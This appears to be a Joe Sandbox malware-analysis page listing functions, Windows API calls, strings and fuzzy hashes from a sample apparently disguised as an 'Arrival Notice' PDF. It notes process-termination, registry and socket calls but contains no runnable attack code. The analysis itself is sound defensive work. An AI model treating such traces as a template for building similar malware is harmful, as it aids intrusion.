Opcode ID: 74f70b4581c83e5b492648fa1b7dd8cee55973ebe5784ae9364b73dc8576f697
Instruction ID: 7741ada04ef92cc87401a4ce6448eee4c8ac99da59593ee861142e7cf7970b8f
Opcode Fuzzy Hash: 74f70b4581c83e5b492648fa1b7dd8cee55973ebe5784ae9364b73dc8576f697
Instruction Fuzzy Hash: 8F51A130920205BFEF229F28DC99FAD7B68AB06314F644156FA15D61E3CFB1E960CB50

Function 0025A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 002BDB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 002BDB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002BDB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 002BDB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002BDB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0025A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 002BDBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 002BDBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0025A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 002BDBC8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: b91dd7224e642911bbdc92b599200681ae2df30206ff856d58deb6bb77f63e02
Instruction ID: 94f3daffde7678df3c92519682be7d97b6fcf1a561bf493be59d75c304b61ea9
Opcode Fuzzy Hash: b91dd7224e642911bbdc92b599200681ae2df30206ff856d58deb6bb77f63e02
Instruction Fuzzy Hash: 68518D70620209EFDB24DF24CC96FAA77B8BB08755F100629F946972D0D7B0EDA4DB54

Function 00287555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00286EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00285FA6,?), ref: 00286ED8

Part of subcall function 00286EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00285FA6,?), ref: 00286EF1

Part of subcall function 002872CB: GetFileAttributesW.KERNEL32(?,00286019), ref: 002872CC

lstrcmpiW.KERNEL32(?,?), ref: 002875CA
_wcscmp.LIBCMT ref: 002875E2
MoveFileW.KERNEL32(?,?), ref: 002875FB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: d7dad36c913feb10b77da2b89762281d7b6c57dadf944e12b80e0fb3bacb80d5
Instruction ID: ba5ec006cde6ea439b1e0882b808722275e16003f47de16d9e70c96ddcb34a14
Opcode Fuzzy Hash: d7dad36c913feb10b77da2b89762281d7b6c57dadf944e12b80e0fb3bacb80d5
Instruction Fuzzy Hash: 1F5120B6A1A2295ADF50FB94D885DDE73BCAF08310B5040AAFA05E3181EA74D7D5CF60

Function 0025EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,002BDAD1,00000004,00000000,00000000), ref: 0025EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,002BDAD1,00000004,00000000,00000000), ref: 0025EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,002BDAD1,00000004,00000000,00000000), ref: 002BDC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,002BDAD1,00000004,00000000,00000000), ref: 002BDCF2

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 01ee7a9bff35c716c3271c6768f8cfc50bb6e56b181beee3feb8be7a272a5f6e
Instruction ID: ddbd08446e3b8073c1eeda2b3cc1ba44661ed7709472cd50f8610b544cb43278
Opcode Fuzzy Hash: 01ee7a9bff35c716c3271c6768f8cfc50bb6e56b181beee3feb8be7a272a5f6e
Instruction Fuzzy Hash: 4C411930235641DBCF3D4F389D8DAB67E9ABB4130BF1B041EE88742561D6B17A68C718

Function 0027B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0027AEF1,00000B00,?,?), ref: 0027B26C
HeapAlloc.KERNEL32(00000000,?,0027AEF1,00000B00,?,?), ref: 0027B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0027AEF1,00000B00,?,?), ref: 0027B288
GetCurrentProcess.KERNEL32(?,00000000,?,0027AEF1,00000B00,?,?), ref: 0027B290
DuplicateHandle.KERNEL32(00000000,?,0027AEF1,00000B00,?,?), ref: 0027B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0027AEF1,00000B00,?,?), ref: 0027B2A3
GetCurrentProcess.KERNEL32(0027AEF1,00000000,?,0027AEF1,00000B00,?,?), ref: 0027B2AB
DuplicateHandle.KERNEL32(00000000,?,0027AEF1,00000B00,?,?), ref: 0027B2AE
CreateThread.KERNEL32(00000000,00000000,0027B2D4,00000000,00000000,00000000), ref: 0027B2C8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: ba7cf9714007afdec3fb566e3ca6e150c7826e3ce59d28e7a91185ccdaa42e01
Instruction ID: 1e6808c534102592b13d98b3cf171674f47e0f5bc55bfc566267d380a11ecf59
Opcode Fuzzy Hash: ba7cf9714007afdec3fb566e3ca6e150c7826e3ce59d28e7a91185ccdaa42e01
Instruction Fuzzy Hash: 3001CDB5240344BFE710AFA5EC4DF6B7BACEB89711F018465FA09DB1A1CAB49801CF61

Function 0029C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 0029C49E
NULL Pointer assignment, xrefs: 0029C876, 0029C887

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 185f13071bae868dcbeb1343a3ae9e8eac0ee9e7320e064a7cd123ceb8fec3c4
Instruction ID: deeb204550d824af4578773795c6428bce1cc356fc5e1234cbd9690ffbcb36ea
Opcode Fuzzy Hash: 185f13071bae868dcbeb1343a3ae9e8eac0ee9e7320e064a7cd123ceb8fec3c4
Instruction Fuzzy Hash: E7E1C771A2021AAFDF14DFA4C885AEEB7B9FF48354F244029F905A7281D770AD61CF90

Function 002916DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0024936C: __swprintf.LIBCMT ref: 002493AB
Part of subcall function 0024936C: __itow.LIBCMT ref: 002493DF

Part of subcall function 0025C6F4: _wcscpy.LIBCMT ref: 0025C717

_wcstok.LIBCMT ref: 0029184E
_wcscpy.LIBCMT ref: 002918DD
_memset.LIBCMT ref: 00291910

Strings

X, xrefs: 00291948
p2/l2/, xrefs: 00291920

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2/l2/
API String ID: 774024439-4159514806
Opcode ID: 4944236651e65fde58c2f137e4ea20d37c03048f7ce67db5d984393ae8b24478
Instruction ID: fb33f2ef9f39fb9eafbee9f290d3a355a2f6f6e2523189e933497cf5c53c3a8f
Opcode Fuzzy Hash: 4944236651e65fde58c2f137e4ea20d37c03048f7ce67db5d984393ae8b24478
Instruction Fuzzy Hash: 0EC191305243419FD728EF24C881A6AB7E4FF85354F10492DF989972A2DB70ED65CF82

Function 002A9A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002A9B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 002A9B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002A9B47
_wcscat.LIBCMT ref: 002A9BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 002A9BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002A9BE7

Strings

SysListView32, xrefs: 002A9AEB

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 7038d2632d47237f2f85d34bc8154f08d3558f30e7433b228cce57febf97c518
Instruction ID: 78975ffbd8e923bd164ef0989d73c5bcfaffe657e1522a774a743f6a63cdd363
Opcode Fuzzy Hash: 7038d2632d47237f2f85d34bc8154f08d3558f30e7433b228cce57febf97c518
Instruction Fuzzy Hash: 5741B271910309ABDB21DF64DC85FEE77A8EF09354F10482AF645E7291CA719D94CB60

Function 002A172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 00286532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00286554
Part of subcall function 00286532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00286564
Part of subcall function 00286532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 002865F9

OpenProcess.KERNEL32(00000001,00000000,?), ref: 002A179A
GetLastError.KERNEL32 ref: 002A17AD
OpenProcess.KERNEL32(00000001,00000000,?), ref: 002A17D9
TerminateProcess.KERNEL32(00000000,00000000), ref: 002A1855
GetLastError.KERNEL32(00000000), ref: 002A1860
CloseHandle.KERNEL32(00000000), ref: 002A1895

Strings

SeDebugPrivilege, xrefs: 002A17B8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: e1156147b870c435ea7e3aed46ec365fc8d9bd5aa219b1aa6a05d379f23d8f58
Instruction ID: 4d091a02eb0e04cbc9ac77a68a03e1c80b37ed09411775faac80fa6414931397
Opcode Fuzzy Hash: e1156147b870c435ea7e3aed46ec365fc8d9bd5aa219b1aa6a05d379f23d8f58
Instruction Fuzzy Hash: 7E41EF71620201AFEB05EF54CC95F6DB7A1AF15711F088099FA069F2C2DFB8A9248F91

Function 00285819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 002858B8

Strings

stop, xrefs: 00285889
info, xrefs: 00285859
blank, xrefs: 0028583A
warning, xrefs: 002858A1
question, xrefs: 00285871

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 9dbce832a0308be86eef48e9bde6e6a3d43e06261b0a6d7eb8c7cef37dd434dc
Instruction ID: 129a40bf64a523424e27ec9574317985580d6194cef348cb3223dcaa8b6a4a9e
Opcode Fuzzy Hash: 9dbce832a0308be86eef48e9bde6e6a3d43e06261b0a6d7eb8c7cef37dd434dc
Instruction Fuzzy Hash: 0D113D3A23AB57FAE7016F559C82D6B739C9F15350B20003BF600E62C1E7B0AAB05769

Function 0028A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0028A806

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 726ba6fcfcb56ab14506c7a1932f99376513c40f669c8e510f85668cf4fd13e9
Instruction ID: 765eee7cf369235e0ac2d5f5380d1530a81c32d2aad47661c0e53e5bce9d13fc
Opcode Fuzzy Hash: 726ba6fcfcb56ab14506c7a1932f99376513c40f669c8e510f85668cf4fd13e9
Instruction Fuzzy Hash: A6C1D17991620ADFEB04EF98C481BAEB7F4FF08315F24406AE605E7281DB74A951CF91

Function 00286B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00286B63
LoadStringW.USER32(00000000), ref: 00286B6A
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00286B80
LoadStringW.USER32(00000000), ref: 00286B87
_wprintf.LIBCMT ref: 00286BAD
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00286BCB

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00286BA8

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: 7636b48a7c4e0431163224894ddb8e493f02c6d419897fed5c821dfe4c3255be
Instruction ID: e625916c92c5f3e560db4feb8ea40d0781ddb1c4a36b512b3570566d0b590746
Opcode Fuzzy Hash: 7636b48a7c4e0431163224894ddb8e493f02c6d419897fed5c821dfe4c3255be
Instruction Fuzzy Hash: DA0136F65502487FE711ABA4AD8DEF7776CD704344F4044A1B749E2041EA74DE958F70

Function 002A2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON

Download Yara Rule

APIs

Part of subcall function 002A3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002A2BB5,?,?), ref: 002A3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002A2BF6

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: BuffCharConnectRegistryUpper
String ID:
API String ID: 2595220575-0
Opcode ID: cefb0b2f10eb7d2348bc10e927ad30f06fd304f1b8667a62110b65493cfe33e1
Instruction ID: 6fc1b5d2029ad33987f55560c1d51fa51a550f19bed57f962ad3e039f680b9be
Opcode Fuzzy Hash: cefb0b2f10eb7d2348bc10e927ad30f06fd304f1b8667a62110b65493cfe33e1
Instruction Fuzzy Hash: 12915871214201DFCB04EF58C885B6EB7E5BF89310F14885DF9969B2A2DB70E929CF42

Function 0029961C Relevance: 12.2, APIs: 8, Instructions: 220networkCOMMON

Download Yara Rule

APIs

select.WSOCK32 ref: 00299691
WSAGetLastError.WSOCK32(00000000), ref: 0029969E
__WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 002996C8
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002996E9
WSAGetLastError.WSOCK32(00000000), ref: 002996F8
inet_ntoa.WSOCK32(?), ref: 00299765
htons.WSOCK32(?,?,?,00000000,?), ref: 002997AA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: ErrorLast$htonsinet_ntoaselect
String ID:
API String ID: 500251541-0
Opcode ID: 326b7d4b8fe8c454a12d27e5cc10b37675e035dd0bf5744b24223bcbbe66d0eb
Instruction ID: 5a5e950d19758b6da822b1c4050b084694644ad89061822b3fe52493c06d57c0
Opcode Fuzzy Hash: 326b7d4b8fe8c454a12d27e5cc10b37675e035dd0bf5744b24223bcbbe66d0eb
Instruction Fuzzy Hash: 6171FD31024200ABC714EF68CC85F6BB7E8FF85724F104A2DF9559B1A1EB70D928CB62

Function 0026A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE

Download Yara Rule

APIs

__mtinitlocknum.LIBCMT ref: 0026A991

Part of subcall function 00267D7C: __FF_MSGBANNER.LIBCMT ref: 00267D91
Part of subcall function 00267D7C: __NMSG_WRITE.LIBCMT ref: 00267D98
Part of subcall function 00267D7C: __malloc_crt.LIBCMT ref: 00267DB8

__lock.LIBCMT ref: 0026A9A4
__lock.LIBCMT ref: 0026A9F0
InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,002F6DE0,00000018,00275E7B,?,00000000,00000109), ref: 0026AA0C
EnterCriticalSection.KERNEL32(8000000C,002F6DE0,00000018,00275E7B,?,00000000,00000109), ref: 0026AA29
LeaveCriticalSection.KERNEL32(8000000C), ref: 0026AA39

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
String ID:
API String ID: 1422805418-0
Opcode ID: 93578368e3b127438ff4e96814da76f8e90b189d2162704763a013003ef4f1ac
Instruction ID: 79c90dfb5a8ffeab62621a30dc030b25ff3a9d36e132d6de571a8de247169687
Opcode Fuzzy Hash: 93578368e3b127438ff4e96814da76f8e90b189d2162704763a013003ef4f1ac
Instruction Fuzzy Hash: C8414B719212069BEB149FA8DA4475CB7B4BF01334F20832AE525BB2E1D7749CE0CF92

Function 002A8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 002A8EE4
GetDC.USER32(00000000), ref: 002A8EEC
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002A8EF7
ReleaseDC.USER32(00000000,00000000), ref: 002A8F03
CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 002A8F3F
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002A8F50
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002ABD19,?,?,000000FF,00000000,?,000000FF,?), ref: 002A8F8A
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002A8FAA

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787101952.00000000002FA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787123457.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_240000_Arrival Notice_pdf.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: a29fffb8b73510bc6e10dfef98fa5e8219765ede5999e945b5a957c8959b7e8a
Instruction ID: 86022f6d91acdf5c0341fad9d743e7605c07d630bf82cf7e6436d37b27fbcf2d
Opcode Fuzzy Hash: a29fffb8b73510bc6e10dfef98fa5e8219765ede5999e945b5a957c8959b7e8a
Instruction Fuzzy Hash: C4318E72200214BFEB108F54EC4AFEB3BADEF4A715F044065FE49DA291CAB59851CBB4

Function 002B0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0025B34E: GetWindowLongW.USER32(?,000000EB), ref: 0025B35F

GetSystemMetrics.USER32(0000000F), ref: 002B016D
MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 002B038D
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002B03AB
InvalidateRect.USER32(?,00000000,00000001,?), ref: 002B03D6
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002B03FF
ShowWindow.USER32(00000003,00000000), ref: 002B0421
DefDlgProcW.USER32(?,00000005,?,?), ref: 002B0440

Memory Dump Source

Source File: 00000000.00000002.1786978457.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true

Associated: 00000000.00000002.1786956587.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002CD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1787041964.00000000002EE000.00000002.00000001.01000000.00000003.sdmpDownload File
